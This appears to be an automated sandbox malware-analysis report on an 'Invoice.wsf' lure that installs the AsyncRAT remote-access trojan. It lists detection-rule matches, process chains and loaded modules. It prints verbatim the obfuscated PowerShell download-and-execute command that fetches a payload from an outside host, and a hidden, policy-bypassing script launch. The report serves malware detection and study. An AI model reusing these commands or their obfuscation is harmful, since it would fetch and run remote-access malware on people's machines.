                Source: wscript.exe, 00000000.00000003.1659330673.000002092EA21000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1753518951.000002092EA1C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                Source: powershell.exe, 00000001.00000002.1740752837.0000021E9D980000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1718048847.0000021E8F44A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1949124988.00000238954D3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: powershell.exe, 00000001.00000002.1718048847.0000021E8F0A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                Source: powershell.exe, 00000001.00000002.1718048847.0000021E8F0A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                Source: unknownHTTPS traffic detected: 192.185.141.13:443 -> 192.168.2.4:49730 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 192.185.141.13:443 -> 192.168.2.4:49731 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Yara detected AsyncRAT
                Source: Yara matchFile source: 6.2.powershell.exe.238854bf788.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.powershell.exe.238854bf788.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.1876842507.00000238872B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4120510718.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4124653013.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.1876842507.00000238853A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7104, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3592, type: MEMORYSTR

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: dump.pcap, type: PCAPMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 6.2.powershell.exe.238854bf788.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                Source: 6.2.powershell.exe.238854bf788.1.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                Source: 6.2.powershell.exe.238854bf788.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                Source: 00000008.00000002.4121148795.00000000010CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 00000008.00000002.4121148795.0000000001113000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 00000006.00000002.1876842507.00000238872B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                Source: 00000006.00000002.1876842507.00000238872B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                Source: 00000008.00000002.4120510718.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                Source: 00000008.00000002.4120510718.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                Source: 00000008.00000002.4124653013.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 00000006.00000002.1876842507.00000238853A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                Source: Process Memory Space: RegSvcs.exe PID: 3592, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                Source: Process Memory Space: RegSvcs.exe PID: 3592, type: MEMORYSTRMatched rule: Detects AsyncRAT Author: ditekSHen
                Sample has a suspicious name (potential lure to open the executable)
                Source: Invoice.wsfStatic file information: Suspicious name
                Windows Scripting host queries suspicious COM object (likely to drop second stage)
                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                Wscript starts Powershell (via cmd or directly)
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='-@-@-@-$-%^(''https://afclifescience-tiurma.com/rkem.jpg'')'.RePLACe('-@-@-@-$-%^','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.bat" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.ps1'"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='-@-@-@-$-%^(''https://afclifescience-tiurma.com/rkem.jpg'')'.RePLACe('-@-@-@-$-%^','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.bat" "Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.ps1'"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B821E221_2_00007FFD9B821E22
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B8229641_2_00007FFD9B822964
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B82458A1_2_00007FFD9B82458A
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B82A7A21_2_00007FFD9B82A7A2
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B82351A1_2_00007FFD9B82351A
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B8253021_2_00007FFD9B825302
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B824B2A1_2_00007FFD9B824B2A
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD9B7F1A366_2_00007FFD9B7F1A36
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_071F1B108_2_071F1B10
                Source: Invoice.wsfInitial sample: Strings found which are bigger than 50
                Source: dump.pcap, type: PCAPMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 6.2.powershell.exe.238854bf788.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                Source: 6.2.powershell.exe.238854bf788.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                Source: 6.2.powershell.exe.238854bf788.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                Source: 00000008.00000002.4121148795.00000000010CA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 00000008.00000002.4121148795.0000000001113000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 00000006.00000002.1876842507.00000238872B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                Source: 00000006.00000002.1876842507.00000238872B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                Source: 00000008.00000002.4120510718.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                Source: 00000008.00000002.4120510718.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                Source: 00000008.00000002.4124653013.0000000002E81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 00000006.00000002.1876842507.00000238853A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
                Source: Process Memory Space: RegSvcs.exe PID: 3592, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
                Source: Process Memory Space: RegSvcs.exe PID: 3592, type: MEMORYSTRMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                Source: 6.2.powershell.exe.2389d3d0000.2.raw.unpack, EwV3ECxYhIse1SOarW.csCryptographic APIs: 'CreateDecryptor'
                Source: 6.2.powershell.exe.2389d3d0000.2.raw.unpack, EwV3ECxYhIse1SOarW.csCryptographic APIs: 'CreateDecryptor'
                Source: 6.2.powershell.exe.23886ebeab0.0.raw.unpack, EwV3ECxYhIse1SOarW.csCryptographic APIs: 'CreateDecryptor'
                Source: 6.2.powershell.exe.23886ebeab0.0.raw.unpack, EwV3ECxYhIse1SOarW.csCryptographic APIs: 'CreateDecryptor'
                Source: 6.2.powershell.exe.238854bf788.1.raw.unpack, oqwGSofdlOxxXlf.csBase64 encoded string: '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
                Source: classification engineClassification label: mal100.troj.expl.evad.winWSF@13/9@2/2
                Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\jxs[1].txtJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3688:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3756:120:WilError_03
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_dikojiosidjoishouisddksjmfnldjvfdonlkd
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_aazunhzh.wbw.ps1Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.bat" "
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.vbs"
                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Invoice.wsf"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='-@-@-@-$-%^(''https://afclifescience-tiurma.com/rkem.jpg'')'.RePLACe('-@-@-@-$-%^','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.vbs"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.bat" "
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.ps1'"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [BYTe[]];$A123='IeX(NeW-OBJeCT NeT.W';$B456='eBCLIeNT).DOWNLO';[BYTe[]];$C789='-@-@-@-$-%^(''https://afclifescience-tiurma.com/rkem.jpg'')'.RePLACe('-@-@-@-$-%^','ADSTRING');[BYTe[]];IeX($A123+$B456+$C789)Jump to behavior
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.bat" "Jump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\mtOR0ZGTUhkVGJGcFhUVmRSTUZsV.ps1'"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
